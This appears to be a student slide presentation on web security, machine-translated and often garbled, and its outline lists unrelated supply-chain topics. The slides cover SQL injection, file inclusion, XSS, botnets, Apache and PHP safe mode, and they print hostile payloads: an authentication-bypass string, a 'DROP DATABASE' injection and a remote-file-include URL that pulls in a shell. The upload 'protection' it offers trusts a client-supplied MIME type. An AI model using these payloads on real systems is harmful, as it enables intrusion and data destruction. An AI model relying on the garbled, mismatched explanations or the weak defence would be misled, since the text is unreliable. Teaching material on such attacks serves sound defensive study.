1 / 23

Web security

Web security. Prepared By : Arafat El- mdhon Ahmed El- falouji “ AnAs ” Supervised By:Ms.Iman El- ajrame. Outline. Introduction Supply Chain Supply Chain Management E- Supply Chain E- Supply Chain Management E-Supply Chain Transactions over the Internet

lenora
Télécharger la présentation

Web security

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Web security Prepared By : Arafat El-mdhon Ahmed El-falouji “AnAs” Supervised By:Ms.Iman El-ajrame

  2. Outline • Introduction • Supply Chain • Supply Chain Management • E- Supply Chain • E- Supply Chain Management • E-Supply Chain Transactions over the Internet • Infrastructure for E-SCM • Information Technology: A Supply Chain Enabler

  3. First, the definition of Web security is to maintain the security of sites and servers from the following points: • 1 - Close all gaps2 - challenged all programs3 - Installing and install the required software4 - Follow-up and shut down tracker5 - Follow-up and check the server and location of any software or mis-line system6 - Maintaining the equilibrium system without any problem with the system7 - check the system periodically8 - Choosing the appropriate system and stronger like me

  4. The difference between the operating systems on the security of information: • First Linux System 1 - is the strongest ever, for several reasons 2 - not support for the lot of the formulas, such as exe is the most serious 3 - Not very much support for the viruses that supported by other systems, 4 - an open source system is entitled to any programmer to modify it for the better and stronger protection 5 - Determination of the powers of its user and administrator and under 6 - support for programming languages Syndicate flexibility 7 - I have opened the way programmers Aktar amendment to be safe and send what has adjusted to the parent company of Linux 8 - A strong system of saluting not used by any person if any metal Windows system that would maintain its strength in the security

  5. Cont… • Second Windows system: Despite the flaws in the Windows system, but there are advantages : 1 - Easy to use terms of use for users and for its proximity to the systems that are used to all the. 2 - support all programming languages such as php language of the original asp While there are systems such as Linux do not support all programming languages . 3 - the difficulty in raising directed hacker tools on Windows because of their differing from sql server to msql . 4 - support for the control panels is much safer and less spread.

  6. Con… Gap is a software error in the script or program or in general we can say .. Software error in the HTML .. Because this code can be a module or addon or have a template up .. And of course what we care about is the gaps to be exploited .. It kinds of .. Kinds of gaps in systems, web and how to protect them Type I: gaps servers Type II: gaps in programs Type III: gaps sites

  7. Gaps: Servers • Are loopholes in the system to server or in the nucleus or in the major programs come with the server or the system .. And the exploitation of these vulnerabilities posed a risk to the server Because it will lead to the clicks of the powers to change or do things detrimental to server .. Things that can be caused by a gap to server is too much .. Especially if the nucleus of the system itself and not by the addition of software or similar .. , Because the error in the kernel causes many problems that can be used in a multi-.. Manager such as adding a new system or taking powers of the Director or play the system settings or many of the things

  8. Gaps in programs: • Is a software error in the program code causing the exploitation of the possibility of controlling and directing the program to do certain things .. Be dangerous gap, according to the program function and fitness regime .. Each hole is different from the other Bhsb type and direction and in the workplace .. Any gap, for example one of the programs that are running the power system administrator .. And be connected to the system and the kernel .. Can be dangerous Ktgrat system or the kernel itself But the gap in the program that is unusual powers or even nobody powers or powers to be not so great .. Will not lead to a relatively simple action or be less dangerous to the system .. And the seriousness of the gap, according to the program as it relates to kernel, according to its terms of reference on the server

  9. Gaps sites: • Is a software errors in a script .. Would use this error to extract information from the site and some of the gaps to the partial control of the site, which leads to the possibility of Active Control sometimes ..The danger of gaps in sites that are controlled and then Active control or access to the server and files server .. Which will lead to a breakthrough server

  10. Types of gaps sites: Con.. • Gaps injection databases: Are the gaps and be playing the values of the variables used in queries .. And to create a new query based on the original query performs a particular function .. Most manipulations are to display data such as username and password if they are registered in the database .. In some cases, has the authority to create files on the server or read files it .. The danger of gaps in the SQL server that is not protected well and if he can use all the functions query ..

  11. Con>>> • They are serious so that the server is well protected because they can cause to know the user name and password for the site but this site or control script leads to partial control, and Active, and then control access to servers and other things .. Gaps, one of the most dangerous .. • $user_name="swalif"; $password="softs"; $query = "SELECT * FROM users WHERE user='$user_name' AND password='$password'"; mysql_query($query);   • Imagine if the password has become • $password="' OR ''='";  • Become the sql commands • $query = "SELECT * FROM users WHERE user='swalif' AND password='' OR ''='' "; mysql_query($query);  • In this way may be able to login to your Almokhtpfp sections without the need for the user name or password is correct.

  12. Con… • Does not stop at only that, imagine if he has the introduction of this sentence as a password: • $password="'; DROP DATABASE database_name;" • "It's very compiler: • $query = "SELECT * FROM users WHERE user='swalif' AND password=''; DROP DATABASE database_nam"; mysql_query($query);  • Implementation of orders gaps Command Execution:Are gaps to permit the application orders directly through one of the existing scripts .. These gaps are of the most serious gaps because it enables access to the server directly, without the need for further action or time .. Which is similar to the gaps Remote File Include in the mechanism of work, but more so ..

  13. local file include:File entry is the process of an internal code and application code that read the contents inside, or if he is not a code ..Is used to read the clicks of files or to configure the Shell that Shell was able to raise on the same server along the BayVaries according to conditions of exploitation and Code  • Remote File Include:Is the process of inclusion and introducing it into an external file for the applicationThe most serious of the local file include .. Because it does not need to raise the profile on the same server or even abide by the terms and the search for the points and paths, etc. .. All you need is to raise the external shell will be admitted in any page ..Is very close to the command execution

  14. Definition: .. • File Upload:Are gaps that enables you to raise the files on the server and application EcuadhaFile Disclosure:Are gaps that enables you to read files on the server

  15. First xss • Are serious gaps and are widely used and is used two uses The first use to obtain all the information on the target device and all passwords And use the other middle exploit these passwords to hacked sites It relies on stealing passwords of the person targeted and Aktar target sites that are forums and tracker sites that contain a property profile So as to cause it contains the website files on the support the development of small metal files her income html code which is dependent on development of small files an income when he visits the site and the sites a person is stealing all passwords And also being exploited Code and in linking the site and injected seeks to steal passwords for each person who enters the site including the site manager and steal Malomato leading to the site being hacked easily and serious also the site global metal sites Hotmail sites and Paypal and sites that contain Visa

  16. Cont… • Protection, including protection can be cleaned periodically Koicz browser Disable Active support of these characteristics tracker metal profile and the html and the like Second File include :A tracker the most dangerous saluting are gaps pour certain files in programming, which allows the hacker upload through that tracker files and metal Chilat and without massage of the type, Text and reviewed hacker and easily controlled through the shell lifting means that raising prompt Ooms of the system, both by the system to server or Windows or Linux For example, I knead for example, www.llllloooooz.com/web.php?r=http://shale.txt?

  17. <<<<Cont>>>>> • And here was lifted from the variable shell injured site and this type of tracker may cause serious discernible to the Root to the server, and server protection by For this gap, which is the best way to protect against them, a conditional sentence be added the following code before upload files • $var=$_FILE["file"]["type"];if($var=="application/x-php " or $var=="text/plain ") {echo "error message";}else{//upload code 

  18. Bot Net Cont. Bot net is a process operating on direct attacks on the server is extremely strong, with inability to many people today about the arrest of those attacks that take place through bot net is the so-called attack parents dos and which is a direct attack to the server increasingly disorganized by a particular method followed by for example, hackers penetrate the device 100 and the directionality of the 100 non-structured device to the server in this case the firewall fails to repel these attacks and prevent Llano Hadi in case it also attacks the firewall itself  Firewall can not protect against attacks staged to reflect the firewall itself and the deadline expires depends on the gaps in the network protocols can not do without them

  19. Cont... • Apache is a program that is installed on the server which is excellent because it contains additives, such as Front Page and encryption ulna and Obed encryptions systems that support the Web is good for programmers Are installed on the server until the server Billz lot of things in the task and the most important things code Is the one who set the servers and supported encodings support a system of web and a picture library and all those things Despite its shortcomings and lacunae, but it is updated every period of time can also add programs it is new to him and additions by the user whose Of its features and powerful is that it is designed to Almajular any bouquets that you can add him to raise the other of a tool without the need to change things complicated in the program continued.

  20. Cont>>> • And useful of this design of Apache you'll add the things that really need them and leave things that do not need them and this is what will raise the performance and speed of the server instance, if you want to take advantage of the features of FrontPage Extension enough to add the package only. Organizations Apache is done by editing the lines in text files and this is very appropriate for programmers who rely on writing, but it will cause problems for those who are accustomed to the graphical interface, and with that there is a program Comanche, which added to the Apache you can control options for Apache by the graphical interface. But the command that you should pay attention to him that with every change must restart Apache to be changes to take effect.

  21. Finally • Safe-modeIs very important in servers and must be enabled which means that the sword mode is either Off or Online, everything has a meaning When Off is in this case, the user credentials to the server, open and accessible to other users of data to the server, and this is a big problem and this case be present in the case of one site to the server, any that there is no something else When it is online, which means that the sword mode enabled on your situation and Bob this is something good to protect the server and protect users from data entry to some definitions of terms and this is usually located Balserfrat

  22. Cont.. • Safe-mode has other benefits such as disabling software functions lead to penetration of the server and the like and prevent certain programming functions Xi is very important to prevent so-called symylink and tools to help prevent hackers to move between sites to server

  23. Thanks a lot for all of you, we hope it was beneficial and interesting presentationBest regards Arafat El-mdhom Ahmed El-falouji “AnAs”

More Related